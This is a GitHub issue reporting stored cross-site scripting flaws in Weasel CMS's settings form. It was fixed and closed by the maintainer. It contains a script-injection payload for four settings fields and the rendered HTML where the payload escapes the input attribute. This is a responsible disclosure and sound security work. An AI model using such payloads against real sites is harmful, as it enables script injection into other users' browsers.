Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There have XSS vulnerability that can excute javascript #5

Closed
SkyZhang47 opened this Issue Jul 31, 2018 · 1 comment

Comments

Projects
None yet
2 participants
@SkyZhang47
Copy link

SkyZhang47 commented Jul 31, 2018

There are 4 XSS vulnerabilities
loading index.php
sign in and select "SETTINGS",
Insert the payload "'"()/ ><ScRiPt >alert(0)</ScRiPt>//" in the Site Language/Site Title/Site Description/Site Keywords and submit.

open index.php
line 376

<section class="column-one-third sidebar">
--
  | <h2><i class="fa fa-cog fa-fw"></i> Settings</h2>
  | <form method="POST" action="/cms/weasel/index.php">
  |  
  | <p>
  | <label for="site-language">
  | <span><i class="fa fa-globe fa-fw"></i> Site Language <small>( 2 letter i.e: ES, EN )</small></span>
  | <input type="text" name="site-language" id="site-language" value="'"()/ ><ScRiPt >alert(0)</ScRiPt>//" />
  | </label>
  | </p>
  | <p>
  | <label for="site-title">
  | <span><i class="fa fa-font fa-fw"></i> Site Title</span>
  | <input type="text" name="site-title" id="site-title" value="Weasel CMS" />
  | </label>
  | </p>
  | <p>
  | <label for="site-description">
  | <span><i class="fa fa-align-left fa-fw"></i> Site Description</span>
  | <input type="text" name="site-description" id="site-description" value="Open Source, very simple and lightweight flat file Content Management System written in PHP and built specifically for small websites." />
  | </label>
  | </p>
  | <p>
  | <label for="site-keywords">
  | <span><i class="fa fa-tags fa-fw"></i> Site Keywords <small>( Comma separated values )</small></span>
  | <input type="text" name="site-keywords" id="site-keywords" value="Weasel, WeaselCMS, PHP, CMS, Simple, lightweight, small, easy, Minimal" />
  | </label>
  | </p>
  | <p>
  | <label for="site-theme">
  | <span><i class="fa fa-paint-brush fa-fw"></i> Theme</span>
  | <select name="site-theme" id="site-theme">
  | <option value="weasel">weasel</option><option value="weasel-dark" selected=selected>weasel-dark</option>						 	</select>
  | </label>
  | </p>
  | <p>
  | <input type="submit" name="settings-submit" id="settings-submit" class="button-main" value="Save Settings" />
  | </p>
  | </form>
  | </section>

@alterebro alterebro closed this in d13ff92 Jul 31, 2018

@alterebro

This comment has been minimized.

Copy link
Owner

alterebro commented Jul 31, 2018

Thanks for reporting this @SkyZhang47

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.